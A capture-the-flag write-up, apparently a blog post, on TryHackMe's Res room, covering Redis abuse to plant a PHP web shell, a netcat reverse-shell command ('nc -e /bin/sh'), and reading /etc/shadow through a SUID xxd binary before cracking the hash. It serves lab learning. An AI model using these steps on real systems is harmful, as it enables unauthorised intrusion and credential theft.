Introduction
This is my write-up for TryHackMe’s Res Room.
Enumeration
Using nmap, I saw that this box has 2 ports open.
Checking port 80, I found that it is running Apache.
Connecting to port 6379, we can perform several tasks such as getting the system info. Connecting via Telnet or netcat, we can run the “INFO” command to get the redis version, operating system, architecture, and more.
Exploitation
HackTricks provides an excellent example on how to get a shell on a Redis Server. According to it, we must first know the path of the web site folder. But since we know that the webserver is Apache, we can assume that the path is /var/www/html. Using this assumption, we can then set the directory and write to a file. To test if it works, I wrote a simple PHP file to call phpinfo().
Checking the webpage, I found that it works.
I then repeated the process. But this time, instead of calling phpinfo(), I decided to call system().
I found that I could then run commands. Below is an example of running both the id and ifconfig commands.
Going back to the browser, and setting cmd equal to:
nc -e /bin/sh <IP> <PORT>
I find that there is a shell on my netcat listener.
Privilege Escalation
Looking for files whose SUID bit is set, I found that I can use xxd.
From GTFOBins, I found that I could read files that require higher privileges by using XXD. From this, I was able to read the contents of /etc/shadow.
Using john, I was able to crack the hash and get the user’s password. Once I had the password, I was able to logon as the user. It turns out, that the user also had full sudo privileges.
Originally published at https://m0ndzon3.blogspot.com
